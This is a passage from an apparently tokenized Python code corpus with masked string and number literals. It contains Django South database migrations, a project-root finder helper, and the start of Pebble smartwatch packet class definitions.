u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : 
'<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from south . utils import datetime_utils as datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . delete_unique ( u'<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:50> , null = True ) , <EOL> keep_default = False ) <EOL> db . alter_column ( u'<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True ) ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> db . alter_column ( u'<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) <EOL> db . create_unique ( u'<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] 
, { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] 
, { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' 
: { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:target>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , 
'<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> __author__ = '<STR_LIT>' <EOL> from django . utils . translation import ugettext as _ <EOL> def find_project_root ( contents ) : <EOL> MANIFEST = '<STR_LIT>' <EOL> SRC_DIR = '<STR_LIT>' <EOL> for base_dir in contents : <EOL> print base_dir <EOL> try : <EOL> dir_end = base_dir . index ( MANIFEST ) <EOL> print dir_end <EOL> except ValueError : <EOL> continue <EOL> else : <EOL> if dir_end + len ( MANIFEST ) != len ( base_dir ) : <EOL> print '<STR_LIT>' <EOL> continue <EOL> base_dir = base_dir [ : dir_end ] <EOL> print base_dir <EOL> for source_dir in contents : <EOL> if source_dir [ : dir_end ] != base_dir : <EOL> continue <EOL> if not source_dir . endswith ( '<STR_LIT>' ) and not source_dir . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if source_dir [ dir_end : dir_end + len ( SRC_DIR ) ] != SRC_DIR : <EOL> continue <EOL> break <EOL> else : <EOL> continue <EOL> break <EOL> else : <EOL> raise Exception ( _ ( "<STR_LIT>" ) ) <EOL> return base_dir </s>
<s> from __future__ import absolute_import <EOL> __author__ = '<STR_LIT>' <EOL> from enum import IntEnum <EOL> from . base import PebblePacket <EOL> from . base . types import * <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> class AppMessageTuple ( PebblePacket ) : <EOL> """<STR_LIT>""" <EOL> class Type ( IntEnum ) : <EOL> ByteArray = <NUM_LIT:0> <EOL> CString = <NUM_LIT:1> <EOL> Uint = <NUM_LIT:2> <EOL> Int = <NUM_LIT:3> <EOL> key = Uint32 ( ) <EOL> type = Uint8 ( ) <EOL> length = Uint16 ( ) <EOL> data = BinaryArray ( length = length ) <EOL> class AppMessagePush ( PebblePacket ) : <EOL> uuid = UUID ( ) <EOL> count = Uint8 ( ) <EOL> dictionary = FixedList ( AppMessageTuple , count = count ) <EOL> class AppMessageACK ( PebblePacket ) : <EOL> pass <EOL> class AppMessageNACK ( PebblePacket ) : <EOL> pass <EOL> class AppMessage ( PebblePacket ) : <EOL> class Meta : <EOL> endpoint = <NUM_LIT> <EOL> endianness = '<STR_LIT:<>' <EOL> command = Uint8 ( ) <EOL> transaction_id = Uint8 ( ) <EOL> data = Union ( command , { <EOL> <NUM_LIT> : AppMessagePush , <EOL> <NUM_LIT> : AppMessageACK , <EOL> <NUM_LIT> : AppMessageNACK , <EOL> } ) <EOL> class StockAppSetTitle ( PebblePacket ) : <EOL> class Meta : <EOL> endpoint = <NUM_LIT> <EOL> endianness = '<STR_LIT:<>' <EOL> register = False <EOL> class App ( IntEnum ) : <EOL> Sports = <NUM_LIT> <EOL> Golf = <NUM_LIT> <EOL> app = Uint8 ( enum = App ) <EOL> title = FixedString ( None ) <EOL> class StockAppSetIcon ( PebblePacket ) : <EOL> class Meta 